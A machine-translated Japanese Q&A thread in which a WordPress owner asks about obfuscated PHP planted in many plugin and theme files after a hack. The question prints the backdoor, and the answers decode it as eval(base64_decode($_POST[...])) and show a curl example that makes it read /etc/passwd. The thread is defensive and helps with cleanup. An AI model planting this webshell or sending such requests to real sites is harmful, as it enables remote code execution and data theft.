2016-05-02 7 views
3

私のサイトの1つが昨晩ハッキングされ、いくつかのポルノコンテンツが私のサイトに置かれました。私のワードプレスサイトで疑わしいコードが見つかりました - 修正する方法?

は私がやっていること:

私は、FTPを使用して手動でサイトからアダルトコンテンツを削除しました。

私のウェブサイトは今稼働しています。しかし、私はまだプラグインとテーマファイルでいくつかのコードを見つけることができます。私のクエリは何

<?php 
     $sF="PCT4BA6ODSE_"; 
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c']; 
if(isset($s22)) 
{ 
eval($s21($s22)); 
} 
    ?> 

:以下の通りである私が書いていなかった、コード

  • このコードは何の略で、この何をしているのですか?
  • これは危険ですか?
  • ファイルからこのコードを削除する必要がありますか?
  • これは削除された場合、私のサイトに影響を与えますか?
  • 必要

他のコード提案:

コードのこの種は、100個の+ファイルで提供されています。一度にすべてのファイルからコードを削除する方法はありますか?コードを保存して消毒する方法はありますか?したがって、あまりにも多くのファイルからコードを手動で削除する時間を節約できます。

答えて

4

このコードは何の略で、これは何をしているのですか?

このコードは、攻撃者が任意のコードを実行するために使用するバックドアです。これがコードの意図です。

<?php 
eval(base64_decode($_POST['n842e1c'])); 

攻撃者は、POSTパラメータの彼のエンコードされたペイロードn842e1cで、このファイルへのPOSTリクエストを作成し、PHPコードを実行することができます。

例:

curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE 

ここでは、このZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=echo readfile('/etc/passwd');のBASE64エンコードされた文字列です。

これは危険ですか?

はい

私は私のファイルからこのコードを削除する必要がありますか?

はい

削除した場合、これは私のサイトに影響を作るのだろうか?

Hereあなたがウェブサイトをきれいにするのに役立ついくつかのヒントです。また、Wordpressのthis公式ポストに従って必要な手順を実行してください。

+0

ありがとうございました。本当に感謝しております –

2
  1. これはバックドアで、POSTパラメータn842e1cを取得して実行します。命令はBase64としてエンコードされます。
  2. です。
  3. すぐに対応してください。
  4. 何もせずに削除してください。

多分、wordpressを再インストールするか、ファイルからこの文字列を削除するためにPython(あるいは何か)のスクリプトをすばやく開発することができます。

1

PHP評価は危険です。

基本的には、その機能内でコードを実行します。あなたのウェブサイトでの使用が不明な場合は、削除する必要があります。

任意のPHPコードの実行が許可されているため、eval()言語構造は非常に危険です。したがってその使用はお勧めしません。 がこの 構成を使用する以外のオプションがないことを慎重に確認した場合は、ユーザーが提供したデータ を事前に適切に検証することなくそのデータを渡さないように注意してください。 Source

唯一の選択肢は、あなたがすべてのファイルからコードを削除しているので、あなたはそれを直接無効にすることはできません。

関連する問題